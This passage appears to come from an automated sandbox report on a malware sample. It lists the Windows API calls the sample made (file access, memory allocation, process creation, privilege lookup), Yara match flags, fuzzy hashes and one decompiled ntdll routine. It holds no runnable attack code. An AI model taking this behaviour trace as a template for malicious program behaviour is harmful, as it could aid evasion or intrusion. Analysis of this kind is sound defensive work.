                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 57eb646065f0a8f27c772a2c545156dc597530bb46e81b78a329c24368998b04
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0144FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0144FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0144FE2B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02EC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02EC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02EC9DBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(02EC4D42,5EB6522D,FFFFFFFF,02EC4A01,?,?,02EC4D42,?,02EC4A01,FFFFFFFF,5EB6522D,02EC4D42,?,00000000), ref: 02EC9E65
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(02EC4D42,5EB6522D,FFFFFFFF,02EC4A01,?,?,02EC4D42,?,02EC4A01,FFFFFFFF,5EB6522D,02EC4D42,?,00000000), ref: 02EC9E65
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EB2D11,00002000,00003000,00000004), ref: 02EC9F89
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EB2D11,00002000,00003000,00000004), ref: 02EC9F89
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(02EC4D20,?,?,02EC4D20,00000000,FFFFFFFF), ref: 02EC9EC5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02EC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02EC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02EC9DBD
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
                                                • Instruction ID: 951244609dfabead26ae9d8497ee311f699ca72dda08dcc8174f98905259da08
                                                • Opcode Fuzzy Hash: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
                                                • Instruction Fuzzy Hash: E090027132118C06E120A15A8414706004597D5241F51C421A4814558D8BD588917162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
                                                • Instruction ID: 7183cf44f6624221d3c581cbed6965726a11bf101b95a93deec0f4c4eb9123ef
                                                • Opcode Fuzzy Hash: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
                                                • Instruction Fuzzy Hash: B490026932304806E190B15A541860A004597D5242F91D425A4005558CCE5588697361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
                                                • Instruction ID: 507591acf32b7f9becaca15c5d63e90ecb4380d3997096a75078bf2d741ed9e2
                                                • Opcode Fuzzy Hash: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
                                                • Instruction Fuzzy Hash: 4C90027131104C06E190B15A441464A004597D5341F91C025A4015654DCF558A5977E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
                                                • Instruction ID: 0c1e606460b0607bae671412410bd1c346768bd33e8681deddafa83f940fd83e
                                                • Opcode Fuzzy Hash: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
                                                • Instruction Fuzzy Hash: 8990027131508C46E150B15A4414A46005597D4345F51C021A4054694D9B658D55B6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
                                                • Instruction ID: 387ed555abc394f4f6e99374e53d5f25d6ee3631633b222065c9a91774276891
                                                • Opcode Fuzzy Hash: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
                                                • Instruction Fuzzy Hash: 939002713110CC06E120A15A841474A004597D4341F55C421A8414658D8BD588917161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
                                                • Instruction ID: 36e66db7d64a402afae3b2bb8465b7eba8dcc7b55de7ba37e9ac75d3a406f7e7
                                                • Opcode Fuzzy Hash: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
                                                • Instruction Fuzzy Hash: 2590027131104C46E110A15A4414B46004597E4341F51C026A4114654D8B55C8517561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
                                                • Instruction ID: 299682ff307750e06faa59f1efb00e3d2aee2e065bb49e0b309dd58af0677512
                                                • Opcode Fuzzy Hash: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
                                                • Instruction Fuzzy Hash: 59900265321048071115E55A0714507008697D9391351C031F5005550CDB6188617161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
                                                • Instruction ID: 423dfe95f272bb9da6fa10e9ebbe4a319e027b44b9cff8538055a64474f5b3f4
                                                • Opcode Fuzzy Hash: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
                                                • Instruction Fuzzy Hash: 849002A1312048075115B15A4424616404A97E4241B51C031E5004590DCA6588917165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EB3AF8), ref: 02ECA0AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 6ead45282d365c8c77932f19a8572f2894026f987c3f8ff9f5968f897c420129
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: B4E046B1200208ABDB18EF99DC49EA777ADEF88750F118558FE089B351C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02EB834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02EB836B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 1120a1ff3273dc7bd2404a3293879139ded73d2c7468a4d26c453bc699b36bdb
                                                • Instruction ID: e70443417e7a364c666dfafac9cb38d15e30077a69abb87dca287b4e328728e3
                                                • Opcode Fuzzy Hash: 1120a1ff3273dc7bd2404a3293879139ded73d2c7468a4d26c453bc699b36bdb
                                                • Instruction Fuzzy Hash: 8601A731AC02287BEB21A6D49D02FFF776C6F40B55F158119FF04BA2C0E6A469064AF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EBF1A2,02EBF1A2,?,00000000,?,?), ref: 02ECA210
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 9ceea577af146f15f75e74266aefb032c1ca47feb00331d883f86114ec9c30a8
                                                • Instruction ID: 994e35f17066611884e29bd4b3f6e0ecb15be30da4fcc3657ad7ad4d177fc3a6
                                                • Opcode Fuzzy Hash: 9ceea577af146f15f75e74266aefb032c1ca47feb00331d883f86114ec9c30a8
                                                • Instruction Fuzzy Hash: 22011BB2240208AFDB14DF89DC45EEB77ADAF88754F118168BA0997251CA30E811CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02EBAD42
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
                                                • Instruction ID: 27c06b65b0b7b8422df4c0681f405e2de3a1fec22d5eaaad1eaf346b41c6ef87
                                                • Opcode Fuzzy Hash: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
                                                • Instruction Fuzzy Hash: 4A015EB5D4020DABDF10EAE4DD45FDEB7799F04308F1091A9E90997240FA31E7498B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02ECA144
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 9135c69dafb1350dfc37f769ff64c52d9e1c58fff2c478f98a710d6ff0f544d3
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 1801AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0D97250C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(02EC4506,?,02EC4C7F,02EC4C7F,?,02EC4506,?,?,?,?,?,00000000,00000000,?), ref: 02ECA06D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 8a55a1d30db2625fd684d45554dfbc3b31a58fa3774bdaf3e8325e465f2f3b99
                                                • Instruction ID: 3dbb8bce76dcfbc09530b325ae645fe69cdb5abfaac802c3b6937bc679e368ac
                                                • Opcode Fuzzy Hash: 8a55a1d30db2625fd684d45554dfbc3b31a58fa3774bdaf3e8325e465f2f3b99
                                                • Instruction Fuzzy Hash: 67F0F4B52482446FC710DFB49C81DD77BA5EF81304B25899DF8C857602C130E90A8BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(02EC4506,?,02EC4C7F,02EC4C7F,?,02EC4506,?,?,?,?,?,00000000,00000000,?), ref: 02ECA06D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 862062f67492bd43908ac18060c0838318dd577d6e8f819e1494961d109c4a64
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: F8E012B1200208ABDB18EF99DC41EA777ADAF88650F118558BA089B241C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EBF1A2,02EBF1A2,?,00000000,?,?), ref: 02ECA210
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 81d135f056326606a3c62384edba8fb1231001d0c4dc2f97641fb8eb69844187
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 77E01AB12002086BDB14DF89DC85EE737ADAF88650F118164BA0857241C930E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02EB8CF4,?), ref: 02EBF6CB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: bf0c1005770563476216c8f7f59386ff3655066e91c6a81e8822a88eb4e089a7
                                                • Instruction ID: 531e24a19f76019eb5ef2bab7aa50d5fe41cd8225dcc240fa0051ecdc564fd68
                                                • Opcode Fuzzy Hash: bf0c1005770563476216c8f7f59386ff3655066e91c6a81e8822a88eb4e089a7
                                                • Instruction Fuzzy Hash: F5D02BD15B83402EE711FBB05C02F072B050B11304F1A4998E588FF0D7D858D0154235
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02EB8CF4,?), ref: 02EBF6CB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 25bed9740bb03e78d731493335abeb5a5df4df6e70947b2bd67e08914e854408
                                                • Instruction ID: d35a2034f2c228b4711984e429f49d34adf621863592536e68b5ab07a6e3786d
                                                • Opcode Fuzzy Hash: 25bed9740bb03e78d731493335abeb5a5df4df6e70947b2bd67e08914e854408
                                                • Instruction Fuzzy Hash: 3BD0A7717D03043BE610FAE49C03F6733CD5B44B04F494064FA48DB3C3D950E4014565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
                                                • Instruction ID: 7c06ae1e292b2f386f418a5295893d4ca9075432bc6c5285c4573704a45a3a65
                                                • Opcode Fuzzy Hash: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
                                                • Instruction Fuzzy Hash: CCB09B719024C9C9F615D76146087177944B7D5741F16C061E6020641B4778C095F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 53%
                                                			E037AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = E0375CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E037A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E037A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037AFDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037AFE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037AFE01
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
                                                • Instruction ID: ae2a64a2e0877d44d23dbe522c54ffca407fd13f36942ecc5688439e4019a864
                                                • Opcode Fuzzy Hash: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
                                                • Instruction Fuzzy Hash: DEF04C76100601BFD6205B49CC05F37BF5ADB80730F140314F628591D1E962F82086F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%